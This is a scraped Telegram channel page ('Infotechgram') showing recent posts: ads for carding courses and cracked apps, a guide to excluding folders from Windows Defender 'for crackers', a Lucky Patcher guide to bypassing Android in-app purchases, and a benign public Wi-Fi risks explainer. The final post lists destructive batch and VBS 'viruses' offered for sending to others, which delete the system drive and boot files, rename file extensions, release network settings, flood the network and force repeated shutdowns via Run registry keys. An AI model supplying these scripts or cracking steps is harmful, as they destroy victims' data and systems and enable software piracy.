Get Mystery Box with random crypto!

Infotechgram 💻🎭

Logo of telegram channel infotechgram — Infotechgram 💻🎭 I
Logo of telegram channel infotechgram — Infotechgram 💻🎭
Channel address: @infotechgram
Categories: Technologies
Language: English
Subscribers: 12.86K
Description from channel

❄️ Security world Hacking ✔️
❄️ Courses Tutorials ✔️
❄️ And much much more....
contact : @infotechgrams or @infotechgram_bot
Instagram: https://www.instagram.com/infotechgram/

Ratings & Reviews

2.67

3 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

1

4 stars

0

3 stars

0

2 stars

1

1 stars

1


The latest Messages 6

2021-03-14 16:00:31
273 viewsInfotechgram Bot, 13:00
Open / Comment
2021-03-14 15:43:30 $5000 FREE HACKING-CARDING COURSE


Billionaires Life


| 119k FUNNY NAUGHTY MEME
━━━━━━━━━━━

| 432k Memes/Jokes/Videos
━━━━━━━━━━━

| 113k Cracked Apps Store
━━━━━━━━━━━

| 136k Mod Premium Android Apps And Games A Cracked Modded APK's Hub
━━━━━━━━━━━

| 125k TRADING & TECHNOLOGICAL COURSES
━━━━━━━━━━━

| 355k Hack Everything
━━━━━━━━━━━

| 320k LATEST WEBSERIES
━━━━━━━━━━━

| 520k Udemy Gdrive Courses
━━━━━━━━━━━

| 550k AMAZON / NETFLIX / HOTSTAR / PRIME / ZEE5
━━━━━━━━━━━

| 374k Premium Android App
━━━━━━━━━━━

| 131k WEB SERIES ONLY
━━━━━━━━━━━

| 574k FREE UDEMY COURSE
━━━━━━━━━━━

| 367k Learn Hacking and Programming
━━━━━━━━━━━

| 129k Hacking ToolS & remium Android AppS
━━━━━━━━━━━

| 497k 🅟ᴀɪᴅ Aᴘᴘs + 🅟ᴄ Sᴏғᴡᴀʀᴇs & Pʀᴇᴍɪᴜᴍ A̶̶ᴄ̶̶ᴄ̶̶ᴏ̶̶ᴜ̶̶ɴ̶̶ᴛ̶̶s̶
━━━━━━━━━━━

| 365k NAUGHTY GIRL MEME
━━━━━━━━━━━

1 hr Top 24 hrs in Channel.

Paid Promotion Here
220 views10k #Share Bot, 12:43
Open / Comment
2021-03-14 13:28:24 How to Exclude Files & Folders From Windows Defender

we are going to share a detailed guide on how to exclude files and folders from the Windows defender for crackers. So, let’s check out.

Step 1: First of all, click on the Start button and select ‘Settings’

Step 2: On the Settings page, click on the ‘Update & Security’ option.

Step 3: From the left-hand side pane, click on the ‘Virus & threat protection’

Step 4: Now click on the ‘Manage settings’ under ‘Virus & threat protection settings’

Step 5: Now scroll down to the ‘Exclusions’ section. There click on the ‘Add or remove exclusions’

Step 6: You will now see a screen like below. Here you need to click on the ‘Add an exclusion’ option. It will show you four different options –

File: Pick File if you want to exclude a specific file.

Folder: Use this option if you want to exclude an entire folder.

File Type: If you want to exclude file extensions like .pdf, .mp3, .exe, etc., then pick this one.

Process: Select this one if you want to add background tasks and processes.

Step 7: For example, we have chosen to exclude a folder. Just locate the folder which you want to add to the exclusion list.

Step 8: Once done, the folder will be added to the exclusion list.

Step 9: Similarly, you can exclude file, file type, & process as well.

Step 10: If for any reason, you want to remove a file or folder from the exclusion list, then click on the entry and click on ‘Remove’

That’s it! You are done. This is how you can exclude files and folders from the Windows defender.

Share and support us
386 viewsInfotechgram Bot, 10:28
Open / Comment
2021-03-14 04:10:59 How to Recover Data From Corrupted OS

We are going to use EaseUS data recovery to recover data from a crashed operating system. The software is mainly designed for data recovery cases of any operating system crash.

Step 1: First of all, launch EaseUS data recovery on a working computer. Select ‘USB Drive’ from the list and click on ‘Proceed’. Wait for few minutes until EaseUS data recovery creates a WinPE bootable disk.

Step 2: Once done, connect the bootable disk to the PC with the corrupted Windows system files. Restart the PC and press F2 during the start. This will run the EaseUS data recovery on the startup.

Step 3: Now it will show you the disk partitions. Select the disk where you want to recover data and then click on the ‘Scan’ button.

Step 4: Now, wait for a few minutes until the tool scans for the available data. Once done, it will list all file types that can be recovered.

Step 5: You can either choose to preview or click on the ‘Recover’ button to save the file. Make sure to choose a different drive or different USB to save the file.

That’s it, you are done! This is how you can use EaseUS data recovery to recover data from a Crashed operating system.

Keep supporting us
577 viewsInfotechgram Bot, 01:10
Open / Comment
2021-03-13 20:19:09

10K+ FULL ON PROMOTIONS



◆━━━━━━━━◆❃❃◆━━━━━━━━◆
*Trending Channels on Telegram*
◆━━━━━━━━◆❃❃◆━━━━━━━━◆


》》 Trader King - BANKNIFTY/NIFTY Options
░█ 🇯 🇴 🇮 🇳 █░


》》 PREMIUM APPS HUB
░█ 🇯 🇴 🇮 🇳 █░


》》 FREE HACKING TUTORIALS
░█ 🇯 🇴 🇮 🇳 █░


》》 FREE 30+ UDEMY COURSES
░█ 🇯 🇴 🇮 🇳 █░


》》 दिलकश रोमांटिक शायरी
░█ 🇯 🇴 🇮 🇳 █░


》》 🇨ʀᴀᴄᴋᴇᴅ🇦ᴘᴘs &🇬ᴀᴍᴇs
░█ 🇯 🇴 🇮 🇳 █░


》》 BEST CRACKED APK AND MODS
░█ 🇯 🇴 🇮 🇳 █░


》》 MEMES/JOKES//VIDEOS
░█ 🇯 🇴 🇮 🇳 █░


》》 Information Technology and Cybersecurity
░█ 🇯 🇴 🇮 🇳 █░


》》 बेहतरीन हिन्दी शायरी
░█ 🇯 🇴 🇮 🇳 █░


》》 NETFLIX ID & PASSWORD
░█ 🇯 🇴 🇮 🇳 █░


》》 BUDDHA QUOTES
░█ 🇯 🇴 🇮 🇳 █░



◆━━━━━━━━◆❃❃◆━━━━━━━━◆
List 1 hour top
24 Hours To your Channel
◆━━━━━━━━◆❃❃◆━━━━━━━━◆
267 viewsFull on Promotions 10k Bot, 17:19
Open / Comment
2021-03-13 15:48:56 $5000 FREE HACKING-CARDING COURSE


Billionaires Life


| 282k FUNNY NAUGHTY MEME
━━━━━━━━━━━

| 208k Mod Premium Android Apps And Games A Cracked Modded APK's Hub
━━━━━━━━━━━

| 105k TRADING & TECHNOLOGICAL COURSES
━━━━━━━━━━━

| 277k Hack Everything
━━━━━━━━━━━

| 456k LATEST WEBSERIES
━━━━━━━━━━━

| 183k Udemy Gdrive Courses
━━━━━━━━━━━

| 147k AMAZON / NETFLIX / HOTSTAR / PRIME / ZEE5
━━━━━━━━━━━

| 240k Premium Android App
━━━━━━━━━━━

| 336k WEB SERIES ONLY
━━━━━━━━━━━

| 442k FREE UDEMY COURSE
━━━━━━━━━━━

| 457k Learn Hacking and Programming
━━━━━━━━━━━

| 232k Hacking ToolS & remium Android AppS
━━━━━━━━━━━

| 540k Memes/Jokes/Videos
━━━━━━━━━━━

| 240k Cracked Apps Store
━━━━━━━━━━━

| 198k NAUGHTY GIRL MEME
━━━━━━━━━━━

1 hr Top 24 hrs in Channel.

Paid Promotion Here
351 views10k #Share Bot, 12:48
Open / Comment
2021-03-12 21:26:52 What Are The Risks Of Using A Public Wi-Fi?

The problem with public Wi-Fi is that there are a tremendous number of risks that go along with these networks. While business owners may believe they’re providing a valuable service to their customers, chances are the security on these networks is lax or nonexistent.

Man in the Middle Attacks

One of the most common threats on these networks is called a Man in the Middle (MitM) attack. Essentially, a MitM attack is a form of eavesdropping. When a computer makes a connection to the Internet, data is sent from point A (computer) to point B (service/website), and vulnerabilities can allow an attacker to get in between these transmissions and “read” them. So what you thought was private no longer is.

Unencrypted Networks

Encryption means that the messages that are sent between your computer and the wireless router are in the form of a “secret code,” so that they cannot be read by anyone who doesn’t have the key to decipher the code. Most routers are shipped from the factory with encryption turned off by default, and it must be turned on when the network is set up. If an IT professional sets up the network, then chances are good that encryption has been enabled. However, there is no surefire way to tell if this has happened.

Malware Distribution

Thanks to software vulnerabilities, there are also ways that attackers can slip malware onto your computer without you even knowing. A software vulnerability is a security hole or weakness found in an operating system or software program. Hackers can exploit this weakness by writing code to target a specific vulnerability, and then inject the malware onto your device.

Snooping & Sniffing

Wi-Fi snooping and sniffing is what it sounds like. Cybercriminals can buy special software kits and even devices to help assist them with eavesdropping on Wi-Fi signals. This technique can allow the attackers to access everything that you are doing online — from viewing whole webpages you have visited (including any information you may have filled out while visiting that webpage) to being able to capture your login credentials, and even being able to hijack your accounts.

Malicious Hotspots

These “rogue access points” trick victims into connecting to what they think is a legitimate network because the name sounds reputable. Say you’re staying at the Goodnyght Inn and want to connect to the hotel’s Wi-Fi. You may think you’re selecting the correct one when you click on “GoodNyte Inn,” but you haven’t. Instead, you’ve just connected to a rogue hotspot set up by cybercriminals who can now view your sensitive information.

Share and Support
740 viewsInfotechgram Bot, 18:26
Open / Comment
2021-03-11 20:27:56 HOW TO CRACK ANY ANDROID APP, GAME OR ANYTHING BEEN IS A THIRD PARTY APP

What is lucky Patcher?

Lucky Patcher is a very cool app that has the capability of patching all other apps installed on the device and can modify them according to your wish. With these apps, you will be able to hack any of your favorite game or any other recharging app to get the free bonus.

There are two ways of doing this process

1. By rooting

2. Non-Rooting

Method 1:


1)Lunch Lucky patcher apk and grant root access.

2)You may minimize or close Lucky patcher at this moment and launch the app which you want to get the Pro vision or the paid vision.

3)Go to purchase section and click on buy or pro vision or anything that is written in your app.

4)Now the Lucky patcher's window opens itself instead of google in app purchase box. In that window you will see "Do you want to try to get this app for free" as shown in screen shots below and Select "yes". Non-rooted user Click on "send reply to application(Unsigned).

5)Done. Now you hacked the In app purchase successfully. If the app is supported, then the thing you are trying to download starts downloading or the feature you want Unlock will be unlocked.


(You may also do as described below to increase your chance of success)

1)Open Lucky patcher apk and find Google play store.

2)Tap on it and select "open menu of patches"

3)You will see a warning window saying "It is a system app ....", select ok.

4)Tap on "Custom pach" and select the first one "support.Inapp.LVL.android.vending" and tap apply.

5)Reboot your device.

6)Now act method 1 again.

Applying custom patch to google play store will increase your chance of success.



If you want to disable the Lucky patcher's automatically open, please follow steps below:

1)Open Lucky patcher and go to toolbox at bottom left corner.

2)Select 'Disable google Billing emulation'.




Method 2:


1)Open Lucky patcher and find the app you want to hack the in app purchasement.

2)If in app purchasement available, you will see "In app purchases found" below the app.

3)Long press on the app or just tap on the app and click on "open menu of patches".

4)Select "Support patch for In app and LVL emulation.

5)Select apply, wait until it finishes. After that your device will reboot automatically.

If your patch was successful, you may say goodbye to the obnoxious google in app emulation window, that used to come when you select to buy something. You can buy anything for free.


Done! you may enjoy the hacked app now.
206 viewsInfotechgram Bot, 17:27
Open / Comment
2021-03-11 20:19:05

10K+ FULL ON PROMOTIONS



◆━━━━━━━━◆❃❃◆━━━━━━━━◆
*Trending Channels on Telegram*
◆━━━━━━━━◆❃❃◆━━━━━━━━◆


》》 Trader King - BANKNIFTY/NIFTY Options
░█ 🇯 🇴 🇮 🇳 █░


》》 PREMIUM APPS HUB
░█ 🇯 🇴 🇮 🇳 █░


》》 FREE HACKING TUTORIALS
░█ 🇯 🇴 🇮 🇳 █░


》》 FREE 30+ UDEMY COURSES
░█ 🇯 🇴 🇮 🇳 █░


》》 दिलकश रोमांटिक शायरी
░█ 🇯 🇴 🇮 🇳 █░


》》 🇨ʀᴀᴄᴋᴇᴅ🇦ᴘᴘs &🇬ᴀᴍᴇs
░█ 🇯 🇴 🇮 🇳 █░


》》 BEST CRACKED APK AND MODS
░█ 🇯 🇴 🇮 🇳 █░


》》 MEMES/JOKES//VIDEOS
░█ 🇯 🇴 🇮 🇳 █░


》》 Information Technology and Cybersecurity
░█ 🇯 🇴 🇮 🇳 █░


》》 बेहतरीन हिन्दी शायरी
░█ 🇯 🇴 🇮 🇳 █░


》》 NETFLIX ID & PASSWORD
░█ 🇯 🇴 🇮 🇳 █░


》》 BUDDHA QUOTES
░█ 🇯 🇴 🇮 🇳 █░



◆━━━━━━━━◆❃❃◆━━━━━━━━◆
List 1 hour top
24 Hours To your Channel
◆━━━━━━━━◆❃❃◆━━━━━━━━◆
188 viewsFull on Promotions 10k Bot, 17:19
Open / Comment
2021-03-11 17:10:04 cript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

Method 12 :

This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%. /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat


Method 13 :

This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

Method 14 :

The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: . |y

Save It As Anything.bat

Method 15 :

Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

Method 16:

Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

Method 17 :

Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File

Method 18 :

Change Files To Non-working TXT Files
Save As A bat File

REN
.DOC .TXT REN .JPEG .TXT
REN
.LNK .TXT
REN
.AVI .TXT
REN
.MPEG .TXT
REN
.COM .TXT
REN
.BAT .TXT


Method 19 :

System Meltdown

:CRASH
net send
WORKGROUP ENABLED
net send WORKGROUP ENABLED
GOTO CRASH
ipconfig /release

shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN
.DOC .TXT
REN
.JPEG .TXT
REN
.LNK .TXT
REN
.AVI .TXT
REN
.MPEG .TXT
REN
.COM .TXT
REN
.BAT .TXT

PAUSE

PAUSE

Save As A bat File

Method 20 :

Temporarily Flood Network

:CRASH
net send
WORKGROUP ENABLED
net send WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad
? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

That's all , now the computer will
automatically shutdown on every startup !
364 viewsInfotechgram Bot, 14:10
Open / Comment